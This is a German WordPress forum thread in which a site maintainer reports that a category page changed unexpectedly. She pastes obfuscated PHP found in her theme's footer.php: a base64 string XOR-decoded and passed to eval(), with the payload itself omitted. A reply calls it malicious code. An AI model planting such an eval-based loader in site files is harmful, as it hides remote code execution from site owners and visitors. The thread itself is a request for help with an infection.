1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

Aussehen einer Kategorie-Seite hat sich plötzlich verändert

Dieses Thema im Forum "Design" wurde erstellt von syl.za, 18. Januar 2017.

  1. syl.za

    syl.za Member

    Registriert seit:
    18. Juni 2015
    Beiträge:
    7
    Zustimmungen:
    0
    Hallo,

    ich bräucht wieder einmal eure Hilfe.

    Heute war ich seit längerem wieder auf einer der Seiten die ich beruflich betreuen muss. Als ich mir dort so durch klickte und im Menü auf "Projekte" ging, traf mich fast der Schlag weil sich das Aussehen dieser Kategorie-Seite komplett verändert hat. Und das ohne mein Zutun. Ich wüsste auch nicht wer in meinem Unternehmen das sonst hätte machen sollen. Da alle anderen die diese Seite warten nur die Inhalte warten.

    Als ich mich auf die Suche nach der Ursache begab viel mir auf, dass im Verzeichnis des Themes seit März 2015 an keiner PHP-Seite bzw. an keinem der Stylesheets was verändert wurde außer an der footer.php. Die wurde angeblich letzte Woche verändert. Als ich sie aufgemacht habe ist mir ein kryptischer Code aufgefallen bei dem ich nicht weiß was er zu bedeuten hat.

    <?php /* 5pJQhrPh3XJCUOiaQCa6 */ ?>
    <?php
    $encoded = "eine kryptische Zahlen- und Buchstabenfolge die zu lang ist um sie hier in der Beitrag einzufügen";
    $raw = base64_decode($encoded);
    $res = '';
    for ($i = 0; $i < strlen($raw); $i++) {
    $res .= chr(ord($raw[$i]) ^ ord('x'));
    }
    eval($res)


    ?>


    <?php /* uqjsQSyWVhmOHAEVa1i6 */




    Kann mir jemand sagen was das bedeutet bzw. ob mein Problem vielleicht gar daran liegt? Ich weiß nicht mehr weiter.

    Danke und LG,
    Sylvia

    P.S.: Weil ich sicher gefragt werde: Es geht um die Seite:www.die-organisation.at/category/projekte
     
  2. am3

    am3 Well-Known Member

    Registriert seit:
    11. März 2010
    Beiträge:
    462
    Zustimmungen:
    21
    Wird halt Schadcode sein :)
     
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden